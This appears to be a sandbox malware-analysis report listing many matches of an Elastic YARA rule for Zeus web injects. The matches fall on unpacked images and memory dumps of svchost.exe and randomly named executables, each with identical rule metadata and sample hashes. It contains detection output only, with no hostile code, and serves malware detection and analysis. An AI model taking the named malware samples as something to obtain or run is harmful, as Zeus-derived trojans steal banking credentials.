Source: 2.3.svchost.exe.2700000.42.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2640000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.uavINoSIQh.exe.59d700.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1320000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.70.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.85.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2500000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.60.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.71.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.e82000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2aa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.78.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.28d2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.59.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.54.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.70.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.84.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.52.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.a52000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24b2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.54.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.58.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.e040000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.79.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1342000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.68.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2550000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.e2c0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.55.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.27f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.81.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.73.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1946484273.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1991936635.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1729152425.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1742494940.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1945983887.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
